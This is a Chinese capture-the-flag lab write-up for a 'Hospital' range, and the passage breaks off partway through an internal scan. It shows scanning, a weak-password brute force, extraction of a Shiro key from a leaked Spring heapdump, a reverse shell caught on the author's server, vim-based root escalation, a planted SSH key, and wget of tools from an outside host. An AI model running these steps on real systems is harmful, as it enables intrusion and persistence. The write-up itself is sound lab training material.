春秋云境-Hospital

ひとり灰色の丘
一个人伫立在灰色山岗
乾いた枯草踏みしめて
将乾朽的枯草踏於脚下
思い巡らせる 空の彼方に
让思绪飘向天空的彼方
風に揺れる花びら
在风中轻轻摇曳的花瓣
柔らかなあなたの微笑み
仿若你温和柔软的微笑

---

靶机ip：39.99.147.67

难度：简单

涉及内容：

• 信息收集: 端口扫描 (Fscan/Nmap)、服务指纹识别。
• 内网穿透: 多级代理搭建 (Stowaway)、SOCKS5 隧道配置、Proxychains 流量转发。
• Web 漏洞利用: Grafana 目录遍历漏洞 (CVE-2021-43798) 读取敏感文件。
• 横向移动: 内网弱口令扫描、SSH 密钥利用。
• 数据库攻防: PostgreSQL 弱口令连接、UDF (User-Defined Function) 提权、动态链接库注入。
• 受限环境突破: 极简 Linux 环境下的 LOLBins (Living off the Land Binaries) 利用、绝对路径调用、Bypass Path 限制。

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./FScan_2.0.1_linux_x32 -h 39.99.147.67
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.2s]     已选择服务扫描模式
[1.2s]     开始信息扫描
[1.2s]     最终有效主机数量: 1
[1.2s]     开始主机扫描
[1.2s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.2s]     有效端口数量: 233
[1.3s] [*] 端口开放 39.99.147.67:22
[1.4s] [*] 端口开放 39.99.147.67:8080
[4.3s]     扫描完成, 发现 2 个开放端口
[4.3s]     存活端口数量: 2
[4.3s]     开始漏洞扫描
[4.3s]     POC加载完成: 总共387个，成功387个，失败0个
[5.1s] [*] 网站标题 http://39.99.147.67:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://39.99.147.67:8080/login;jsessionid=A99CACDB950188E9367E24F7DE8147E4
[5.5s] [*] 网站标题 http://39.99.147.67:8080/login;jsessionid=A99CACDB950188E9367E24F7DE8147E4 状态码:200 长度:2005   标题:医疗管理后台
[50.2s]     扫描已完成: 3/3
PS E:\CTF> .\fscan.exe -h 39.99.147.67
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2026-02-07 13:26:56] [INFO] 暴力破解线程数: 1
[2026-02-07 13:26:56] [INFO] 开始信息扫描
[2026-02-07 13:26:57] [INFO] 最终有效主机数量: 1
[2026-02-07 13:26:57] [INFO] 开始主机扫描
[2026-02-07 13:26:57] [INFO] 有效端口数量: 233
[2026-02-07 13:26:57] [SUCCESS] 端口开放 39.99.147.67:22
[2026-02-07 13:26:57] [SUCCESS] 服务识别 39.99.147.67:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 13:26:59] [SUCCESS] 端口开放 39.99.147.67:8080
[2026-02-07 13:27:04] [SUCCESS] 服务识别 39.99.147.67:8080 => [http]
[2026-02-07 13:27:06] [INFO] 存活端口数量: 2
[2026-02-07 13:27:06] [INFO] 开始漏洞扫描
[2026-02-07 13:27:06] [INFO] 加载的插件: ssh, webpoc, webtitle
[2026-02-07 13:27:07] [SUCCESS] 网站标题 http://39.99.147.67:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://39.99.147.67:8080/login;jsessionid=18A0DA74E437BA26F38B6621DC4E9932
[2026-02-07 13:27:07] [SUCCESS] 网站标题 http://39.99.147.67:8080/login;jsessionid=18A0DA74E437BA26F38B6621DC4E9932 状态码:200 长度:2005   标题:医疗管理后台
[2026-02-07 13:27:14] [SUCCESS] 目标: http://39.99.147.67:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2026-02-07 13:27:19] [SUCCESS] 扫描已完成: 3/3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -A -T4 39.99.147.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-07 00:05 -0500
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 00:05 (0:00:00 remaining)
Warning: 39.99.147.67 giving up on port because retransmission cap hit (6).
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:06 (0:00:06 remaining)
Nmap scan report for 39.99.147.67
Host is up (0.0087s latency).
Not shown: 926 closed tcp ports (reset), 72 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 73:68:f3:16:ef:b2:7c:ea:a4:ca:03:e0:f0:cb:31:c4 (RSA)
|   256 0f:03:f5:40:df:f7:7f:af:39:1f:81:59:b1:71:8a:8a (ECDSA)
|_  256 6c:6c:ea:2b:8f:df:fd:80:fa:c7:89:4d:f1:7d:bc:b8 (ED25519)
8080/tcp open  http    Apache Tomcat (language: en)
| http-title: \xE5\x8C\xBB\xE7\x96\x97\xE7\xAE\xA1\xE7\x90\x86\xE5\x90\x8E\xE5\x8F\xB0
|_Requested resource was http://39.99.147.67:8080/login;jsessionid=588133AF0C6C0AD3B58E015F17951AEB
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (96%), DD-WRT v24-sp2 (Linux 2.4.37) (95%), Linux 4.4 (93%), Linux 3.2 (92%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (92%), Microsoft Windows XP SP3 (90%), VMware Player virtual NAT device (88%), BlueArc Titan 2100 NAS device (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.08 ms 192.168.21.2
2   0.10 ms 39.99.147.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.37 seconds

使用burp爆破弱口令。

admin:admin123

进入后台，但是没有发现可利用的点。使用dirsearch进行目录爆破。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://39.99.147.67:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_39.99.147.67_8080/_26-02-07_00-37-32.txt

Target: http://39.99.147.67:8080/

[00:37:32] Starting:                                                                                                                                       
[00:37:37] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[00:37:38] 400 -  435B  - /a%5c.aspx                                        
[00:37:38] 200 -    1KB - /actuator                                         
[00:37:38] 200 -   20B  - /actuator/;/caches
[00:37:38] 200 -    2B  - /actuator/;/info
[00:37:38] 200 -   74KB - /actuator/;/beans
[00:37:39] 200 -   15B  - /actuator/;/health
[00:37:39] 200 -  749B  - /actuator/;/metrics
[00:37:39] 404 -  135B  - /actuator/;/env
[00:37:39] 200 -   93KB - /actuator/;/conditions
[00:37:39] 404 -  150B  - /actuator/;/registeredServices
[00:37:39] 404 -  140B  - /actuator/;/features
[00:37:39] 404 -  143B  - /actuator/;/auditevents
[00:37:39] 404 -  153B  - /actuator/;/configurationMetadata
[00:37:39] 404 -  143B  - /actuator/;/healthcheck
[00:37:39] 404 -  156B  - /actuator/;/exportRegisteredServices
[00:37:39] 404 -  142B  - /actuator/;/prometheus
[00:37:39] 404 -  138B  - /actuator/;/events
[00:37:39] 404 -  138B  - /actuator/;/flyway
[00:37:39] 404 -  141B  - /actuator/;/liquibase
[00:37:39] 404 -  139B  - /actuator/;/jolokia
[00:37:39] 404 -  136B  - /actuator/;/dump
[00:37:39] 404 -  140B  - /actuator/;/auditLog
[00:37:39] 404 -  148B  - /actuator/;/integrationgraph
[00:37:39] 404 -  145B  - /actuator/;/loggingConfig
[00:37:39] 404 -  141B  - /actuator/;/httptrace
[00:37:39] 404 -  139B  - /actuator/;/logfile
[00:37:39] 404 -  139B  - /actuator/;/refresh
[00:37:39] 200 -   20KB - /actuator/;/mappings
[00:37:39] 404 -  149B  - /actuator/;/resolveAttributes
[00:37:39] 404 -  135B  - /actuator/;/sso
[00:37:39] 404 -  149B  - /actuator/;/releaseAttributes
[00:37:39] 404 -  138B  - /actuator/auditLog
[00:37:39] 404 -  145B  - /actuator/;/springWebflow
[00:37:39] 200 -   54B  - /actuator/;/scheduledtasks
[00:37:39] 404 -  137B  - /actuator/;/trace
[00:37:39] 404 -  142B  - /actuator/;/statistics
[00:37:39] 200 -   20B  - /actuator/caches
[00:37:39] 404 -  143B  - /actuator/;/ssoSessions
[00:37:39] 404 -  138B  - /actuator/;/status
[00:37:39] 404 -  151B  - /actuator/configurationMetadata
[00:37:39] 404 -  141B  - /actuator/auditevents
[00:37:39] 404 -  134B  - /actuator/dump
[00:37:39] 404 -  140B  - /actuator/;/sessions
[00:37:39] 404 -  140B  - /actuator/;/shutdown
[00:37:39] 404 -  133B  - /actuator/env
[00:37:39] 404 -  136B  - /actuator/events
[00:37:39] 200 -   15B  - /actuator/health
[00:37:39] 404 -  139B  - /actuator/httptrace
[00:37:39] 404 -  138B  - /actuator/features
[00:37:39] 404 -  144B  - /actuator/gateway/routes
[00:37:39] 404 -  154B  - /actuator/exportRegisteredServices
[00:37:39] 404 -  136B  - /actuator/flyway
[00:37:39] 404 -  141B  - /actuator/healthcheck
[00:37:39] 200 -   93KB - /actuator/conditions
[00:37:39] 200 -   74KB - /actuator/beans
[00:37:39] 200 -   54KB - /actuator/;/loggers
[00:37:40] 200 -    2B  - /actuator/info
[00:37:40] 404 -  140B  - /actuator/management
[00:37:40] 404 -  139B  - /actuator/liquibase
[00:37:40] 404 -  137B  - /actuator/logfile
[00:37:40] 404 -  137B  - /actuator/refresh
[00:37:40] 200 -   54B  - /actuator/scheduledtasks
[00:37:40] 200 -  749B  - /actuator/metrics
[00:37:40] 404 -  140B  - /actuator/prometheus
[00:37:40] 404 -  146B  - /actuator/integrationgraph
[00:37:40] 404 -  147B  - /actuator/releaseAttributes
[00:37:40] 404 -  144B  - /actuator/hystrix.stream
[00:37:40] 404 -  143B  - /actuator/loggingConfig
[00:37:40] 404 -  138B  - /actuator/sessions
[00:37:40] 404 -  137B  - /actuator/jolokia
[00:37:40] 404 -  147B  - /actuator/resolveAttributes
[00:37:40] 404 -  138B  - /actuator/shutdown
[00:37:40] 404 -  148B  - /actuator/registeredServices
[00:37:40] 200 -   20KB - /actuator/mappings
[00:37:40] 200 -    8KB - /actuator/;/configprops
[00:37:40] 200 -    8KB - /actuator/configprops
[00:37:40] 404 -  140B  - /actuator/statistics
[00:37:40] 404 -  143B  - /actuator/springWebflow
[00:37:40] 200 -  196KB - /actuator/;/threaddump
[00:37:40] 404 -  135B  - /actuator/trace
[00:37:40] 404 -  133B  - /actuator/sso
[00:37:40] 404 -  141B  - /actuator/ssoSessions                             
[00:37:40] 404 -  136B  - /actuator/status                                  
[00:37:40] 200 -   54KB - /actuator/loggers                                 
[00:37:40] 200 -  113KB - /actuator/threaddump                              
[00:37:41] 200 -   31MB - /actuator/;/heapdump                              
[00:37:41] 200 -   33MB - /actuator/heapdump                                
[00:37:53] 404 -  132B  - /favicon.ico                                      
[00:37:56] 404 -  134B  - /images/README                                    
[00:37:56] 404 -  127B  - /images
[00:37:56] 404 -  135B  - /images/Sym.php
[00:37:56] 404 -  135B  - /images/c99.php
[00:37:56] 404 -  128B  - /images/
[00:37:58] 200 -    2KB - /login                                            
[00:38:00] 404 -  129B  - /META-INF                                         
[00:38:00] 404 -  144B  - /META-INF/app-config.xml                          
[00:38:00] 404 -  152B  - /META-INF/application-client.xml                  
[00:38:00] 404 -  145B  - /META-INF/application.xml                         
[00:38:00] 404 -  130B  - /META-INF/
[00:38:00] 404 -  139B  - /META-INF/beans.xml
[00:38:00] 404 -  137B  - /META-INF/CERT.SF
[00:38:00] 404 -  143B  - /META-INF/container.xml
[00:38:00] 404 -  141B  - /META-INF/context.xml
[00:38:00] 404 -  141B  - /META-INF/eclipse.inf
[00:38:00] 404 -  141B  - /META-INF/ejb-jar.xml
[00:38:00] 404 -  143B  - /META-INF/jboss-app.xml
[00:38:00] 404 -  151B  - /META-INF/jboss-webservices.xml
[00:38:00] 404 -  160B  - /META-INF/jboss-deployment-structure.xml
[00:38:00] 404 -  144B  - /META-INF/jboss-ejb3.xml
[00:38:00] 404 -  147B  - /META-INF/jbosscmp-jdbc.xml
[00:38:00] 404 -  145B  - /META-INF/ironjacamar.xml
[00:38:00] 404 -  146B  - /META-INF/jboss-client.xml
[00:38:00] 404 -  150B  - /META-INF/jboss-ejb-client.xml
[00:38:00] 404 -  166B  - /META-INF/openwebbeans/openwebbeans.properties
[00:38:00] 404 -  145B  - /META-INF/persistence.xml
[00:38:00] 404 -  154B  - /META-INF/weblogic-application.xml
[00:38:00] 404 -  160B  - /META-INF/spring/application-context.xml          
[00:38:00] 404 -  136B  - /META-INF/ra.xml
[00:38:00] 404 -  141B  - /META-INF/MANIFEST.MF
[00:38:00] 404 -  141B  - /META-INF/SOFTWARE.SF
[00:38:00] 404 -  150B  - /META-INF/weblogic-ejb-jar.xml
[00:38:12] 404 -  128B  - /WEB-INF                                          
[00:38:12] 404 -  129B  - /WEB-INF/
[00:38:12] 404 -  144B  - /WEB-INF/cas-servlet.xml                          
[00:38:12] 404 -  151B  - /WEB-INF/applicationContext.xml
[00:38:12] 404 -  151B  - /WEB-INF/application-client.xml
[00:38:12] 404 -  151B  - /WEB-INF/classes/app-config.xml
[00:38:12] 404 -  138B  - /WEB-INF/beans.xml
[00:38:12] 404 -  151B  - /WEB-INF/application_config.xml
[00:38:12] 404 -  159B  - /WEB-INF/classes/application.properties
[00:38:12] 404 -  143B  - /WEB-INF/cas.properties
[00:38:12] 404 -  159B  - /WEB-INF/classes/applicationContext.xml
[00:38:12] 404 -  150B  - /WEB-INF/classes/db.properties
[00:38:12] 404 -  152B  - /WEB-INF/classes/application.yml
[00:38:12] 404 -  154B  - /WEB-INF/classes/config.properties
[00:38:12] 404 -  157B  - /WEB-INF/classes/countries.properties
[00:38:12] 404 -  165B  - /WEB-INF/classes/cas-theme-default.properties
[00:38:12] 404 -  163B  - /WEB-INF/classes/commons-logging.properties
[00:38:12] 404 -  146B  - /WEB-INF/classes/log4j.xml
[00:38:12] 404 -  153B  - /WEB-INF/classes/log4j.properties
[00:38:12] 404 -  153B  - /WEB-INF/classes/faces-config.xml
[00:38:12] 404 -  154B  - /WEB-INF/classes/hibernate.cfg.xml
[00:38:12] 404 -  150B  - /WEB-INF/classes/languages.xml
[00:38:12] 404 -  145B  - /WEB-INF/classes/demo.xml
[00:38:12] 404 -  148B  - /WEB-INF/classes/logback.xml
[00:38:12] 404 -  161B  - /WEB-INF/classes/default_views.properties
[00:38:12] 404 -  161B  - /WEB-INF/classes/default-theme.properties
[00:38:12] 404 -  157B  - /WEB-INF/classes/fckeditor.properties
[00:38:12] 404 -  156B  - /WEB-INF/classes/messages.properties
[00:38:12] 404 -  147B  - /WEB-INF/classes/mobile.xml
[00:38:12] 404 -  162B  - /WEB-INF/classes/protocol_views.properties
[00:38:12] 404 -  160B  - /WEB-INF/classes/META-INF/app-config.xml
[00:38:12] 404 -  164B  - /WEB-INF/classes/resources/config.properties
[00:38:12] 404 -  152B  - /WEB-INF/classes/persistence.xml
[00:38:12] 404 -  161B  - /WEB-INF/classes/META-INF/persistence.xml
[00:38:12] 404 -  158B  - /WEB-INF/classes/validation.properties
[00:38:12] 404 -  154B  - /WEB-INF/classes/struts-default.vm
[00:38:12] 404 -  153B  - /WEB-INF/classes/theme.properties
[00:38:12] 404 -  156B  - /WEB-INF/classes/velocity.properties
[00:38:12] 404 -  156B  - /WEB-INF/classes/services.properties
[00:38:12] 404 -  147B  - /WEB-INF/classes/struts.xml
[00:38:12] 404 -  143B  - /WEB-INF/components.xml
[00:38:12] 404 -  154B  - /WEB-INF/classes/struts.properties
[00:38:12] 404 -  144B  - /WEB-INF/classes/web.xml
[00:38:12] 404 -  151B  - /WEB-INF/conf/caches.properties
[00:38:12] 404 -  144B  - /WEB-INF/conf/caches.dat
[00:38:12] 404 -  151B  - /WEB-INF/conf/config.properties
[00:38:12] 404 -  152B  - /WEB-INF/conf/daemons.properties
[00:38:12] 404 -  142B  - /WEB-INF/conf/core.xml
[00:38:12] 404 -  150B  - /WEB-INF/conf/core_context.xml
[00:38:12] 404 -  149B  - /WEB-INF/conf/jpa_context.xml
[00:38:12] 404 -  150B  - /WEB-INF/conf/jtidy.properties
[00:38:12] 404 -  152B  - /WEB-INF/conf/editors.properties
[00:38:12] 404 -  147B  - /WEB-INF/conf/db.properties
[00:38:12] 404 -  151B  - /WEB-INF/conf/lutece.properties
[00:38:12] 404 -  144B  - /WEB-INF/conf/mime.types
[00:38:12] 404 -  151B  - /WEB-INF/conf/search.properties
[00:38:12] 404 -  152B  - /WEB-INF/conf/page_navigator.xml
[00:38:12] 404 -  139B  - /WEB-INF/config.xml
[00:38:12] 404 -  148B  - /WEB-INF/conf/wml.properties
[00:38:12] 404 -  154B  - /WEB-INF/conf/webmaster.properties
[00:38:12] 404 -  160B  - /WEB-INF/config/dashboard-statistics.xml
[00:38:12] 404 -  152B  - /WEB-INF/config/faces-config.xml
[00:38:12] 404 -  145B  - /WEB-INF/config/users.xml
[00:38:12] 404 -  148B  - /WEB-INF/config/web-core.xml
[00:38:12] 404 -  153B  - /WEB-INF/config/mua-endpoints.xml
[00:38:12] 404 -  153B  - /WEB-INF/config/webmvc-config.xml
[00:38:12] 404 -  150B  - /WEB-INF/config/soapConfig.xml
[00:38:12] 404 -  154B  - /WEB-INF/config/webflow-config.xml
[00:38:12] 404 -  148B  - /WEB-INF/config/metadata.xml
[00:38:12] 404 -  145B  - /WEB-INF/faces-config.xml
[00:38:12] 404 -  148B  - /WEB-INF/config/security.xml
[00:38:12] 404 -  143B  - /WEB-INF/decorators.xml
[00:38:12] 404 -  154B  - /WEB-INF/deployerConfigContext.xml
[00:38:12] 404 -  151B  - /WEB-INF/dispatcher-servlet.xml
[00:38:12] 404 -  146B  - /WEB-INF/hibernate.cfg.xml
[00:38:12] 404 -  152B  - /WEB-INF/glassfish-resources.xml
[00:38:12] 404 -  146B  - /WEB-INF/glassfish-web.xml
[00:38:12] 404 -  145B  - /WEB-INF/geronimo-web.xml
[00:38:12] 404 -  140B  - /WEB-INF/ejb-jar.xml
[00:38:12] 404 -  140B  - /WEB-INF/ias-web.xml
[00:38:12] 404 -  159B  - /WEB-INF/jboss-deployment-structure.xml
[00:38:12] 404 -  144B  - /WEB-INF/ibm-web-ext.xmi
[00:38:12] 404 -  147B  - /WEB-INF/jax-ws-catalog.xml
[00:38:12] 404 -  144B  - /WEB-INF/ibm-web-bnd.xmi
[00:38:12] 404 -  143B  - /WEB-INF/jboss-ejb3.xml
[00:38:12] 404 -  145B  - /WEB-INF/jboss-client.xml
[00:38:12] 404 -  142B  - /WEB-INF/jboss-web.xml
[00:38:12] 404 -  142B  - /WEB-INF/jetty-env.xml
[00:38:12] 404 -  142B  - /WEB-INF/jetty-web.xml
[00:38:12] 404 -  142B  - /WEB-INF/jonas-web.xml
[00:38:12] 404 -  150B  - /WEB-INF/jboss-webservices.xml
[00:38:12] 404 -  141B  - /WEB-INF/jrun-web.xml
[00:38:12] 404 -  155B  - /WEB-INF/liferay-plugin-package.xml
[00:38:12] 404 -  157B  - /WEB-INF/liferay-layout-templates.xml
[00:38:12] 404 -  154B  - /WEB-INF/liferay-look-and-feel.xml
[00:38:12] 404 -  148B  - /WEB-INF/liferay-display.xml
[00:38:12] 404 -  148B  - /WEB-INF/liferay-portlet.xml
[00:38:12] 404 -  149B  - /WEB-INF/jboss-ejb-client.xml
[00:38:12] 404 -  140B  - /WEB-INF/logback.xml
[00:38:12] 404 -  141B  - /WEB-INF/logs/log.log
[00:38:12] 404 -  140B  - /WEB-INF/portlet.xml
[00:38:12] 404 -  138B  - /WEB-INF/local.xml
[00:38:12] 404 -  149B  - /WEB-INF/remoting-servlet.xml
[00:38:12] 404 -  145B  - /WEB-INF/openx-config.xml
[00:38:12] 404 -  149B  - /WEB-INF/local-jps.properties
[00:38:12] 404 -  156B  - /WEB-INF/resources/config.properties
[00:38:12] 404 -  142B  - /WEB-INF/resin-web.xml
[00:38:12] 404 -  142B  - /WEB-INF/rexip-web.xml
[00:38:12] 404 -  147B  - /WEB-INF/portlet-custom.xml
[00:38:12] 404 -  150B  - /WEB-INF/quartz-properties.xml
[00:38:12] 404 -  148B  - /WEB-INF/restlet-servlet.xml
[00:38:12] 404 -  146B  - /WEB-INF/spring-config.xml
[00:38:12] 404 -  140B  - /WEB-INF/service.xsd
[00:38:12] 404 -  141B  - /WEB-INF/sitemesh.xml
[00:38:12] 404 -  166B  - /WEB-INF/spring-config/application-context.xml
[00:38:12] 404 -  164B  - /WEB-INF/spring-config/management-config.xml
[00:38:12] 404 -  167B  - /WEB-INF/spring-config/authorization-config.xml
[00:38:12] 404 -  163B  - /WEB-INF/spring-config/messaging-config.xml
[00:38:12] 404 -  169B  - /WEB-INF/spring-config/services-remote-config.xml
[00:38:12] 404 -  166B  - /WEB-INF/spring-config/presentation-config.xml
[00:38:12] 404 -  162B  - /WEB-INF/spring-config/services-config.xml
[00:38:12] 404 -  161B  - /WEB-INF/spring-configuration/filters.xml
[00:38:12] 404 -  158B  - /WEB-INF/spring-dispatcher-servlet.xml
[00:38:12] 404 -  147B  - /WEB-INF/spring-context.xml
[00:38:12] 404 -  143B  - /WEB-INF/spring-mvc.xml
[00:38:12] 404 -  150B  - /WEB-INF/struts-config-ext.xml
[00:38:12] 404 -  150B  - /WEB-INF/spring-ws-servlet.xml
[00:38:12] 404 -  153B  - /WEB-INF/spring/webmvc-config.xml
[00:38:12] 404 -  142B  - /WEB-INF/sun-jaxws.xml
[00:38:12] 404 -  150B  - /WEB-INF/springweb-servlet.xml
[00:38:12] 404 -  140B  - /WEB-INF/tjc-web.xml
[00:38:12] 404 -  154B  - /WEB-INF/struts-config-widgets.xml
[00:38:12] 404 -  140B  - /WEB-INF/sun-web.xml
[00:38:12] 404 -  148B  - /WEB-INF/trinidad-config.xml
[00:38:12] 404 -  143B  - /WEB-INF/urlrewrite.xml
[00:38:12] 404 -  143B  - /WEB-INF/tiles-defs.xml
[00:38:12] 404 -  143B  - /WEB-INF/validation.xml
[00:38:12] 404 -  148B  - /WEB-INF/validator-rules.xml
[00:38:12] 404 -  140B  - /WEB-INF/web.xml.jsf
[00:38:12] 404 -  136B  - /WEB-INF/web.xml
[00:38:12] 404 -  142B  - /WEB-INF/web-jetty.xml
[00:38:12] 404 -  144B  - /WEB-INF/web-borland.xml
[00:38:12] 404 -  146B  - /WEB-INF/struts-config.xml
[00:38:12] 404 -  137B  - /WEB-INF/web2.xml
[00:38:12] 404 -  141B  - /WEB-INF/weblogic.xml                             
[00:38:12] 404 -  152B  - /WEB-INF/workflow-properties.xml                  
                                                                             
Task Completed                                                       

结合之前的扫描结果，泄露了heapdump-file。

Spring heapdump信息泄露复现——从0到1 - 月亮丶 - 博客园

Springboot之actuator配置不当的漏洞利用 - FreeBuf网络安全行业门户

使用JDumpSpider进行分析。

PS E:\CTF> java -jar JDumpSpider-1.1-SNAPSHOT-full.jar E:\下载\heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

泄露了shirokey

使用shiro综合利用工具打内存马

vim提权顺便写公钥，但是必须有交互式shell，这里先反弹shell到我们的vps上。

(这里因为临时有事把机子关了，所有会有换ip的现象。)

root@dkhkdZlNGAAKbnRQBVLf:~# nc -lvvp 80
Listening on 0.0.0.0 80
Connection received on 39.98.119.127 54714
id
uid=1000(app) gid=1000(app) groups=1000(app)

shell升级得到伪交互shell。（这里我不知道为什么Penelope会卡死，没法自动升级）

python3 -c 'import pty; pty.spawn("/bin/bash")'
app@web01:~$ 

提权

app@web01:~$ /usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec bash -p")'
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec bash -p")'


                                                                                                                        
bash-5.0# whoami
whoami
root
bash-5.0# 

写公钥

bash-5.0# echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
bash-5.0# 

┌──(root㉿kaada)-[~/.ssh]
└─# ssh root@39.98.119.127
The authenticity of host '39.98.119.127 (39.98.119.127)' can't be established.
ED25519 key fingerprint is: SHA256:muothx+zhk/93sC3+EZzKetY8vqZ720iROGc/pJ+zF0
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '39.98.119.127' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Welcome to Alibaba Cloud Elastic Compute Service !

Last login: Mon Dec 18 18:07:10 2023 from 36.112.10.102
root@web01:~# 

上传fscan探测内网信息.

root@web01:~# busybox wget 38.55.99.145/FScan_2.0.1_linux_x32
Connecting to 38.55.99.145 (38.55.99.145:80)
FScan_2.0.1_linux_x3 100% |***********************************************************************************************************| 7947k  0:00:00 ETA
root@web01:~# 

root@web01:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.30.12.5  netmask 255.255.0.0  broadcast 172.30.255.255
        inet6 fe80::216:3eff:fe31:8b2f  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:31:8b:2f  txqueuelen 1000  (Ethernet)
        RX packets 60611  bytes 84652129 (84.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12744  bytes 10594215 (10.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 956  bytes 86702 (86.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 956  bytes 86702 (86.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@web01:~# ./FScan_2.0.1_linux_x32 -h 172.30.12.0/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1
                                                                                                                                                           
[2.8s]     已选择服务扫描模式                                                                                                                              
[2.8s]     开始信息扫描
[2.8s]     CIDR范围: 172.30.12.0-172.30.12.255
[2.8s]     generate_ip_range_full
[2.8s]     解析CIDR 172.30.12.0/24 -> IP范围 172.30.12.0-172.30.12.255
[2.8s]     最终有效主机数量: 256
[2.8s]     开始主机扫描
[2.8s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle                             
[2.8s] [*] 目标 172.30.12.236   存活 (ICMP)
[2.8s] [*] 目标 172.30.12.5     存活 (ICMP)
[2.8s] [*] 目标 172.30.12.6     存活 (ICMP)
[5.8s]     存活主机数量: 3
[5.8s]     有效端口数量: 233
[5.8s] [*] 端口开放 172.30.12.236:22
[5.8s] [*] 端口开放 172.30.12.236:8009
[5.9s] [*] 端口开放 172.30.12.6:8848
